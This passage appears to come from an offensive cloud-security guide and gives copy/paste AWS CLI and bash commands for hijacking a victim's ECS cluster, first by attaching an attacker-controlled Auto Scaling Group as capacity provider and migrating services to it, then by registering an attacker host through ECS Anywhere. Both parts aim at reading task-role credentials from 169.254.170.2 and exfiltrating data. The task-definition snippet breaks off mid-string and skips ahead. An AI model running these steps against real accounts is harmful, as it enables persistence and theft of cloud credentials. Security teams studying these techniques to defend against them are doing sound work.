- Create an Auto Scaling Group
- Create a capacity provider from the ASG
- Associate the capacity provider with the cluster (optionally as the default)
- Migrate a service to your provider
- Verify that tasks land on attacker instances
- Optional: from the EC2 node, docker exec into the target containers and read http://169.254.170.2 to obtain the task role credentials.
- Cleanup
Potential Impact: Attacker-controlled EC2 nodes receive the victim's tasks, giving OS-level access to the containers and theft of the task IAM role credentials.
Step-by-step commands (copy/paste)
```bash
export AWS_DEFAULT_REGION=us-east-1
CLUSTER=arn:aws:ecs:us-east-1:947247140022:cluster/ht-victim-cluster

# Instance profile for the ECS nodes (EC2 trust policy + AmazonEC2ContainerServiceforEC2Role)
aws iam create-role --role-name ht-ecs-instance-role \
  --assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ec2.amazonaws.com"},"Action":"sts:AssumeRole"}]}' || true
aws iam attach-role-policy --role-name ht-ecs-instance-role \
  --policy-arn arn:aws:iam::aws:policy/service-role/AmazonEC2ContainerServiceforEC2Role || true
aws iam create-instance-profile --instance-profile-name ht-ecs-instance-profile || true
aws iam add-role-to-instance-profile --instance-profile-name ht-ecs-instance-profile \
  --role-name ht-ecs-instance-role || true

# Networking and AMI for the attacker nodes
VPC=vpc-18e6ac62
SUBNETS=<comma-separated subnet ids in $VPC>
AMI=ami-0b570770164588ab4
# User data that makes the ECS agent join the victim cluster on boot
USERDATA=$(printf '#!/bin/bash\necho ECS_CLUSTER=ht-victim-cluster >> /etc/ecs/ecs.config\n' | base64 -w0)

# Launch template (AMI, instance profile, USERDATA) and the Auto Scaling Group built from it
LT_ID=<launch template id>
ASG_ARN=<auto scaling group ARN>

# Capacity provider wrapping the ASG, attached to the cluster as its default strategy
CP_NAME=htcp-8797
aws ecs create-capacity-provider --name "$CP_NAME" \
  --auto-scaling-group-provider "autoScalingGroupArn=$ASG_ARN,managedScaling={status=ENABLED,targetCapacity=100},managedTerminationProtection=DISABLED"
aws ecs put-cluster-capacity-providers --cluster "$CLUSTER" \
  --capacity-providers "$CP_NAME" \
  --default-capacity-provider-strategy capacityProvider="$CP_NAME",weight=1

# Migrate the victim service to the attacker provider
# (the task definition must be EC2-compatible, not Fargate-only)
SVC=<victim service name>
aws ecs update-service --cluster "$CLUSTER" --service "$SVC" \
  --capacity-provider-strategy capacityProvider="$CP_NAME",weight=1 \
  --force-new-deployment

# Verify that the task landed on one of your instances
TASK=<task ARN, e.g. from: aws ecs list-tasks --cluster "$CLUSTER" --service-name "$SVC">
CI=<containerInstanceArn, from: aws ecs describe-tasks --cluster "$CLUSTER" --tasks "$TASK">
aws ecs describe-container-instances --cluster "$CLUSTER" --container-instances "$CI" \
  --query 'containerInstances[0].ec2InstanceId' --output text
```
Backdoor compute in-cluster via ECS Anywhere EXTERNAL registration
Use ECS Anywhere to register an attacker-controlled host as an EXTERNAL container instance in the victim ECS cluster and run tasks on that host with privileged task and execution roles. This gives OS-level control over where the tasks execute (your own machine) and lets you steal credentials/data from the tasks and any attached volumes without touching capacity providers or ASGs.
- Required permissions (minimal example):
  - ecs:CreateCluster (optional), ecs:RegisterTaskDefinition, ecs:StartTask or ecs:RunTask
  - ssm:CreateActivation, ssm:DeregisterManagedInstance, ssm:DeleteActivation
  - iam:CreateRole, iam:AttachRolePolicy, iam:DeleteRole, iam:PassRole (for the ECS Anywhere instance role and the task/execution roles)
  - logs:CreateLogGroup/Stream, logs:PutLogEvents (if awslogs is used)
- Impact: run arbitrary containers with a chosen taskRoleArn on the attacker's host; exfiltrate task-role credentials from 169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI; access any volumes the tasks mount; stealthier than manipulating capacity providers/ASGs.
Steps
- Create/identify the cluster (us-east-1)
```bash
aws ecs create-cluster --cluster-name ht-ecs-anywhere
```
- Create the ECS Anywhere role and an SSM activation (for the on-prem/EXTERNAL instance)
```bash
aws iam create-role --role-name ecsAnywhereRole \
  --assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ssm.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
aws iam attach-role-policy --role-name ecsAnywhereRole --policy-arn arn:aws:iam::aws:policy/AmazonSSMManagedInstanceCore
aws iam attach-role-policy --role-name ecsAnywhereRole --policy-arn arn:aws:iam::aws:policy/service-role/AmazonEC2ContainerServiceforEC2Role
ACTJSON=$(aws ssm create-activation --iam-role ecsAnywhereRole)
ACT_ID=$(echo "$ACTJSON" | jq -r .ActivationId); ACT_CODE=$(echo "$ACTJSON" | jq -r .ActivationCode)
```
- Deploy the attacker host and have it register itself as EXTERNAL (for example a small AL2 EC2 instance playing the "on-prem" role). user-data.sh:
```bash
#!/bin/bash
set -euxo pipefail
amazon-linux-extras enable docker || true
yum install -y docker curl jq
systemctl enable --now docker
curl -fsSL -o /root/ecs-anywhere-install.sh "https://amazon-ecs-agent.s3.amazonaws.com/ecs-anywhere-install-latest.sh"
chmod +x /root/ecs-anywhere-install.sh
/root/ecs-anywhere-install.sh --cluster ht-ecs-anywhere --activation-id ${ACT_ID} --activation-code ${ACT_CODE} --region us-east-1
```
- Task definition (EXTERNAL launch):
```bash
cat > td-external.json << 'JSON'
{
  "family": "ht-external",
  "requiresCompatibilities": [ "EXTERNAL" ],
  "networkMode": "bridge",
  "memory": "256",
  "cpu": "128",
  "executionRoleArn": "arn:aws:iam::
--container-instances $CI
```
- From there you control the host that runs the tasks. You can read the task logs (if awslogs) or exec directly on the host to exfiltrate credentials/data from your tasks.